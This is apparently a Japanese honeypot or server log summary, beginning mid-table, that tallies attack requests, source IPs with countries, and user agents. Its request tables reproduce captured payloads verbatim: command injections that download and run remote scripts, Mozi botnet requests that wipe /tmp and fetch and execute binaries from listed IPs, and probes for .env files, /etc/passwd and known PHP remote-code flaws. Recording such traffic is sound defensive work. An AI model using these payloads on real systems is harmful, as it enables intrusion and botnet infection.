2 POST /nrdh.php?cmd=%60php%20-r%20%22file_put_contents%28%5C%22setup%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22setup.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%20setup%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%20setup.py%3Bchmod%20777%20setup.py%3Bchmod%20777%20setup%3Bpython2%20setup.py%7C%7Cpython2.7%20setup.py%7C%7Cpython%20setup.py%7C%7C.%2Fsetup.py%7C%7C.%2Fsetup%60 HTTP/1.1
2 POST /sys_config_valid.xgi?exeshell=%60php%20-r%20%22file_put_contents%28%5C%22setup%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%3Bcurl%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22setup.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup%20-O%20setup%3Bwget%20http%3A%2F%2Faroiw4q3g5k5ehmc5rqkoqthbstub4hhi3fpgv4sr2hglasoh2l4owyd.onion.ws%2Fsetup.py%20-O%20setup.py%3Bchmod%20777%20setup.py%3Bchmod%20777%20setup%3Bpython2%20setup.py%7C%7Cpython2.7%20setup.py%7C%7Cpython%20setup.py%7C%7C.%2Fsetup.py%7C%7C.%2Fsetup%60 HTTP/1.1
2 POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.10.202 Russia
1 13.56.236.152 United States
1 13.82.143.41 United States
1 23.102.136.161 United States
1 37.49.229.222 Belize
1 40.124.55.5 United States
11 45.146.164.125 Russia
1 49.143.32.6 South Korea
1 52.141.4.93 United States
1 52.146.12.211 United States
1 52.175.213.235 United States
1 58.255.134.233 China
1 60.220.95.126 China
2 62.4.16.207 France
1 91.205.173.252 Germany
1 101.0.34.102 India
1 112.94.98.180 China
1 115.201.44.30 China
1 128.1.248.26 United States
1 138.197.160.142 United States
1 139.162.145.250 Netherlands
3 163.172.159.134 United Kingdom
3 163.172.168.251 United Kingdom
1 163.179.163.62 China
1 172.104.242.173 United States
1 178.175.58.52 Albania
1 183.136.225.14 China
1 192.241.202.93 United States
1 193.118.53.194 United States
1 194.48.199.121 United Kingdom
1 209.126.151.116 United States
2 209.141.33.232 United States
2 212.83.8.81 Russia

UserAgent一覧

件数 UserAgent
7 -
1 Anarchy99
1 Googlebot/2.1 (+http://www.google.com/bot.html)
1 Hello, World
3 Hello, world
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/55.0.2994.61
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.9.0) Gecko/20100101 Firefox/52.9.0
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
2 Pe7kata
1 Python/3.8 aiohttp/3.7.4.post0
1 bitdiscovery
1 python-requests/2.18.4
2 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
8 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /20d7482fa85143bf900c5d2a610f3502 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /api.php?key=1 HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fgdfkgjhsf.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]201[.]44[.]30:45661/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]255[.]134[.]233:54559/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//60[.]220[.]95[.]126:50430/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /user/deposit/simplii HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//likeapro[.]best/2917214a02ec844c9481279340a2ff536d9c712dc36c95a5760a0d124cb029199f363041346463a0ca7e06a899b7b65543ed7e4d74020ff230aac8bd4555a18a5919d63159443ee4d115e592f2148d9c506a4695b7cc8a54ddbb27fd13267970 HTTP/1.1
1 POST http[:]//ritarudnicki[.]site/3617d0293aea437274bb9fa28f987c4fad84a9c35c06182285a580a4e9de42467da8bb85c8cf296b0135c62e37bd3e34d605f2b8c4424fed7d2492286bebd9b10f48d1bfce3ac2f5ed6e11a5086155f1be1c74a36653ecb22e006590239db506 HTTP/1.1